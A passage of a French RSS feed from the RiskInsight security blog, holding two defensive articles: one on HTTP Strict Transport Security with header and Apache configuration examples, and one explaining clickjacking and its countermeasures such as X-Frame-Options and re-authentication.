				<category><![CDATA[Cloud & Next-Gen IT Security]]></category>
		<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Cyberattaque]]></category>
		<category><![CDATA[Cybercriminalité]]></category>
		<category><![CDATA[http]]></category>
		<category><![CDATA[https]]></category>
		<category><![CDATA[internet]]></category>
		<category><![CDATA[security architecture]]></category>
		<guid isPermaLink="false">http://www.solucominsight.fr/?p=3251</guid>

					<description><![CDATA[<p>En internaute averti, vous avez pris l’habitude de vous connecter en HTTPS aux sites sensibles, et de vérifier la présence du petit cadenas à côté de la barre d’adresse, mais cela est-il vraiment suffisant ? Certaines implémentations imparfaites de HTTPS peuvent...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2013/02/http-strict-transport-policy-une-avancee-dans-la-securisation-des-echanges-sur-internet/">HTTP Strict Transport Policy, une avancée dans la sécurisation des échanges sur Internet ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><em>En internaute averti, vous avez pris l’habitude de vous connecter en HTTPS aux sites sensibles, et de vérifier la présence du petit cadenas à côté de la barre d’adresse, mais cela est-il vraiment suffisant ? Certaines implémentations imparfaites de HTTPS peuvent exposer les données échangées, c’est pourquoi un mécanisme de sécurité supplémentaire a été normalisé en fin d’année dernière, <a href="http://tools.ietf.org/html/rfc6797">HTTP Strict Transport Security</a>.</em></p>
<h2>Pourquoi a-t-on besoin de HSTS ?</h2>
<p>Malheureusement, l’utilisation de HTTPS n’est souvent pas exclusive, ouvrant la voie à trois types de menaces :</p>
<ul>
<li><strong>Attaques réseau passives sur des flux non-chiffrés</strong></li>
</ul>
<p>Il arrive fréquemment que seule une partie des requêtes au serveur web soient chiffrées, par exemple l’authentification. Une fois authentifié, les requêtes suivantes sont en clair. Un attaquant capable d’intercepter les flux réseau (sur un Wifi ouvert, au <em>Starbucks</em>, par exemple), pourra alors analyser les requêtes non-chiffrées, qui contiennent les cookies de session de l’utilisateur. Il pourra ainsi usurper son identité.</p>
<ul>
<li><strong>Attaques réseau actives pour détourner le trafic et l’intercepter</strong></li>
</ul>
<p>Il n’est pas rare de rencontrer des sites proposant une connexion sécurisée mais également une connexion HTTP traditionnelle. Il est alors possible, pour un attaquant capable d’intercepter les flux réseau, de modifier à la volée les données envoyées par le site et de remplacer les liens « <strong><em>https://</em></strong><em>www.site.com</em> » par des liens vers la version en clair « <strong><em>http://</em></strong><em>www.site.com</em> ». Des outils permettent d’automatiser cette tâche, comme <a href="http://www.thoughtcrime.org/software/sslstrip">sslstrip</a> : à nouveau l’attaquant pourra intercepter les cookies et usurper l’identité de la victime. L’attaquant pourrait aussi bien tenter de faire accepter à l’utilisateur un certificat invalide, afin de pouvoir déchiffrer les échanges SSL à la volée.</p>
<ul>
<li><strong>Erreurs de développement</strong></li>
</ul>
<p>Il est également possible que, volontairement ou non, certaines requêtes soient effectuées en clair, par exemple pour charger des images ou un contenu vidéo. Si les images sont hébergées sur le même serveur, les cookies seront envoyés avec la requête et là encore, l’attaquant pourra dérober les cookies et usurper l’identité de la victime.</p>
<h2>La solution proposée par HSTS : forcer l’utilisation de HTTPS</h2>
<p>HSTS se propose de parer à ce type d’attaques en permettant aux sites web d’indiquer au navigateur qu’il ne doit accepter d’ouvrir que des liens HTTPS vers ce site.</p>
<p>Pour cela, un en-tête HTTP spécifique doit être envoyé au navigateur, qui n’acceptera alors que des liens https:// pour le site en question, et ce pour un temps donné.</p>
<p>De plus, si une erreur de validation de certificat survenait, le navigateur refuserait d’ouvrir la page en question ; en cas d’utilisation de HSTS, l’utilisateur n’a plus la possibilité de passer outre un message d’erreur de validation du certificat : voilà une avancée judicieuse ! HSTS permet donc un premier niveau de protection contre les attaques de type Man-in-the-middle (homme du milieu).</p>
<h2>Implémenter HSTS en ajoutant les bons en-têtes</h2>
<p>La syntaxe de l’en-tête HTTP est la suivante :</p>
<pre><span style="background-color: #c0c0c0; color: #000000;">Strict-Transport-Security: max-age=XXX; includeSubDomains</span></pre>
<p>&nbsp;</p>
<p>Où :</p>
<ul>
<li>Strict-Transport-Security : indique l’utilisation de HSTS</li>
<li>max-age= : définit la période durant laquelle le navigateur doit forcer l’utilisation de HTTPS, en secondes</li>
<li>includeSubdomains : permet d’indiquer que la politique s’applique également à l’ensemble des sous-domaines ; cette directive est optionnelle</li>
</ul>
<p>Dans le cas d’un serveur web Apache, il convient d’insérer les commandes suivantes dans la configuration du site :</p>
<pre><span style="color: #000000; background-color: #c0c0c0;">Header set Strict-Transport-Security "max-age=XXX"</span></pre>
<pre><span style="color: #000000; background-color: #c0c0c0;">Header append Strict-Transport-Security includeSubDomains</span></pre>
<p>&nbsp;</p>
<p>Il est également conseillé de paramétrer la directive « max-age » de manière dynamique, de façon à la faire coïncider avec la date d’expiration du certificat</p>
<p>HSTS recommande également l’utilisation d’une liste prédéfinie de domaine HSTS par les navigateurs (comme Gmail, Facebook, etc …). Ainsi, on couvre le risque de la première connexion non-chiffrée.</p>
<p>Il est important de noter que les en-têtes HSTS ne sont pris en compte par les navigateurs que si le certificat présenté par le site est signé par une autorité de certification racine présente dans le magasin de certificats, excluant de fait le cas des certificats auto-signés.</p>
<h2>Tous les navigateurs sont-ils compatibles HSTS ?</h2>
<p>Les mécanismes HSTS sont supportés depuis plusieurs années par Chrome, Firefox et Opéra, qui intègrent désormais une liste par défaut de sites HSTS.</p>
<p>En revanche, les navigateurs Internet Explorer de Microsoft et Safari d’Apple sont à la traîne et n’implémentent pas encore ces protections.</p>
<p>HSTS apporte donc une avancée significative dans la sécurisation des échanges sur Internet, et ce de manière transparente pour le grand public. En imposant la sécurité (en ne leur proposant pas d’accepter un certificat invalide), on se prémunit d’un maillon faible, l’utilisateur, qui peut permettre la réalisation d’attaques de type man-in-the-middle comme ce fut récemment le cas pour le site Github en Chine.</p>
<p>Cependant, d’autres menaces subsistent : on pense notamment aux fréquentes faiblesses dans le choix des protocoles et algorithmes de chiffrement. De plus, la problématique des autorités de certification, qui sont garantes des identités sur internet, reste ouverte, comme le rappellent les cas de Diginotar ou plus récemment de <a href="https://blog.mozilla.org/security/2013/01/03/revoking-trust-in-two-turktrust-certficates/">Turktrust</a>.</p>
<p>La sécurisation des échanges sur internet reste une problématique qui requiert de l’expertise dans son implémentation, ainsi que des contrôles réguliers pour assurer la confidentialité et l’intégrité des données échangées vis-à-vis des nouvelles menaces.</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2013/02/http-strict-transport-policy-une-avancee-dans-la-securisation-des-echanges-sur-internet/">HTTP Strict Transport Policy, une avancée dans la sécurisation des échanges sur Internet ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Clickjacking, mais qui a volé ma souris ?</title>
		<link>https://www.riskinsight-wavestone.com/2012/12/clickjacking-mais-qui-a-vole-ma-souris/</link>
		
		<dc:creator><![CDATA[Arnaud Soullié]]></dc:creator>
		<pubDate>Wed, 26 Dec 2012 10:46:41 +0000</pubDate>
				<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Ethical Hacking & Incident Response]]></category>
		<category><![CDATA[Cybercriminalité]]></category>
		<category><![CDATA[incident response CERT-W]]></category>
		<category><![CDATA[internet]]></category>
		<category><![CDATA[réseaux sociaux]]></category>
		<guid isPermaLink="false">http://www.solucominsight.fr/?p=2761</guid>

					<description><![CDATA[<p>Le clickjacking, ou « détournement de clic », est un terme apparu en 2008 pour désigner un type d’attaque ciblant les applications web. Ces attaques visent à tromper l’utilisateur sur l’élément sur lequel il clique, permettant in fine de lui faire réaliser...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2012/12/clickjacking-mais-qui-a-vole-ma-souris/">Clickjacking, mais qui a volé ma souris ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Le <em>clickjacking, </em>ou<em> « détournement de clic »,</em> est un terme apparu en 2008 pour désigner un type d’attaque ciblant les applications web. Ces attaques visent à tromper l’utilisateur sur l’élément sur lequel il clique, permettant <em>in fine</em> de lui faire réaliser des actions à son insu.</p>
<h2>Comment se fait-on <em>clickjacker</em> ?</h2>
<p>Pour mener une attaque par <em>clickjacking</em>, un attaquant va procéder de la manière suivante :</p>
<p>1- Il identifie sa cible, une page non-protégée contre ce type d’attaque, qui permet de réaliser une action en cliquant sur un lien ou un bouton.</p>
<p>2- Il intègre cette page dans une page malveillante qu’il maîtrise</p>
<p>3- Il s’arrange pour que, lorsque la victime clique sur un élément de la page, elle clique en réalité sur un bouton ou un lien provenant du site vulnérable</p>
<p><a href="http://www.solucominsight.fr/2012/12/clickjacking-mais-qui-a-vole-ma-souris/clickjacking-image/" rel="attachment wp-att-2767"><img loading="lazy" decoding="async" class="alignleft  wp-image-2767" title="clickjacking image" src="http://www.solucominsight.fr/wp-content/uploads/2012/12/clickjacking-image.jpg" alt="" width="429" height="291" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2012/12/clickjacking-image.jpg 453w, https://www.riskinsight-wavestone.com/wp-content/uploads/2012/12/clickjacking-image-282x191.jpg 282w, https://www.riskinsight-wavestone.com/wp-content/uploads/2012/12/clickjacking-image-58x39.jpg 58w" sizes="auto, (max-width: 429px) 100vw, 429px" /></a></p>
<p>Par exemple, il peut utiliser les propriétés de style offerte par HTML/CSS pour rendre transparente la page vulnérable. Dans l’exemple ci-dessus, l’utilisateur verra le bouton « Jouer ! » mais cliquera en réalité sur le « Bouton 1 », provenant d’un site différent !</p>
<p>Les exemples les plus fréquents d’attaque par <em>clickjacking</em> sont les “<em>likejacking</em>” et “<em>tweetbomb</em>”. La première, ciblant le réseau social, a pour objectif de faire « <em>liker</em> » une page, c’est-à-dire d’augmenter sa popularité. La seconde vise à diffuser sur Twitter un message, la plupart du temps publicitaire.</p>
<h2>Les risques se limitent-ils aux réseaux sociaux ?</h2>
<p>Mais non ! Il est important de noter que les enjeux liés à ce type d’attaques ne s’arrêtent pas à la pollution de réseaux sociaux. De même que les attaques par <a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29">rejeu de requête (XSRF),</a>  les attaques par <em>clickjacking</em> permettent d’exécuter des actions à l’insu de la victime.</p>
<p>Il est donc tout à fait imaginable d’employer ce type d’attaque afin, par exemple, d’ajouter des articles dans le panier des clients d’un site de e-commerce. Pour cela, il suffirait à l’attaquant de reprendre le scénario précédent, mais de remplacer les boutons « <em>like</em> » de Facebook par le bouton « Ajouter au panier » du site e-commerce. L’attaquant pourrait augmenter grandement les ventes de son produit !</p>
<h2> Comment se protéger efficacement ?</h2>
<p>La protection contre ce type d’attaques est à considérer du double point de vue de l’utilisateur et du responsable du site internet qui sert &#8211; involontairement &#8211; de support à l’attaque. La protection idéale nécessite donc sensibilisation et moyens techniques.</p>
<p>Pour les utilisateurs finaux en effet, se protéger implique d’avoir conscience du risque et de faire preuve de vigilance en surveillant ses fréquentations sur le web ! Il convient de rester méfiant à l’égard des liens commerciaux et des jeux ou concours qui promettent monts et merveilles.</p>
<p>Pour les équipes en charge de la sécurité des applications web, deux éléments sont à considérer pour mitiger le risque lié au <em>clickjacking </em>: l’utilisation d’en-têtes http spécifiques, et l’emploi de protections en JavaScript.</p>
<h4> Utiliser les en-têtes http appropriés pour se protéger</h4>
<p>Il est d’une part possible d’utiliser l’en-tête http<a href="http://tools.ietf.org/html/draft-ietf-websec-x-frame-options-01" target="_blank" rel="noopener noreferrer"> « X-FRAME-OPTIONS »</a>, qui va indiquer au navigateur à quelles conditions le contenu du site peut être intégré dans une iframe. Il est possible de lui spécifier trois valeurs :</p>
<ul>
<li>« DENY », qui va interdire l’inclusion de la page ;</li>
<li>« SAMEORIGIN », qui va autoriser uniquement les sites du même domaine à inclure la page ;</li>
<li>« ALLOW-FROM », qui permet de spécifier le ou les domaines autorisés à inclure la page.</li>
</ul>
<h4>Utiliser JavaScript pour s’assurer que ses pages ne sont pas dissimulées</h4>
<p>En complément, il est possible d’utiliser du code JavaScript pour se protéger. Pour cela, ces codes vont par exemple s’assurer que la page est bien au niveau supérieur et qu’elle sera visible. Il faut néanmoins reconnaître qu’aucun de ces codes n’est totalement fiable.</p>
<p>Pour des informations détaillées sur les implémentations de ces protections, <a href="https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet" target="_blank" rel="noopener noreferrer">le site de l’OWASP propose une page dédiée </a>à ce sujet.</p>
<h4>La réauthentification, meilleure arme de protection pour les actions sensibles</h4>
<p>La solution la plus efficace reste de ré-authentifier l’utilisateur pour les actions sensibles, par exemple en lui redemandant son mot de passe ou en utilisant un second facteur d’authentification, comme cela est l’usage sur les sites de banque en ligne.</p>
<h2>Ces protections sont-elles couramment déployées ?</h2>
<p>En un mot : non. Malheureusement, ce type d’attaque n’est toujours pas, 4 ans après leur découverte, pris au sérieux par la plupart des développeurs / testeurs / équipes de sécurité, sans doute car elles n’ont pour l’instant pas été exploitées à grande échelle en dehors des réseaux sociaux.</p>
<p>Selon un article publié récemment sur <a href="https://community.qualys.com/blogs/securitylabs/2012/11/29/clickjacking-an-overlooked-web-security-hole" target="_blank" rel="noopener noreferrer">le blog de Qualys</a>, les protections standards décrites ci-dessus ne sont ainsi pas encore déployées systématiquement : près de 70% des 20 sites bancaires les plus fréquentés n’implémentent pas de protection efficace contre ce type d’attaque.</p>
<p>Il est fort à parier que l’emploi de ce type d’attaque va augmenter et se diversifier à l’avenir.  En effet, les mesures de protection contre les attaques par <a href="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29">rejeu de requête (XSRF)</a> se généralisant, notamment par leur intégration dans les frameworks de développement, les attaquants se tourneront mécaniquement vers d’autres vulnérabilités, dont le <em>clickjacking</em>. Anticiper dès à présent  reste le moyen le plus sûr d’éviter d’en être la victime.</p>
<p>&nbsp;</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2012/12/clickjacking-mais-qui-a-vole-ma-souris/">Clickjacking, mais qui a volé ma souris ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
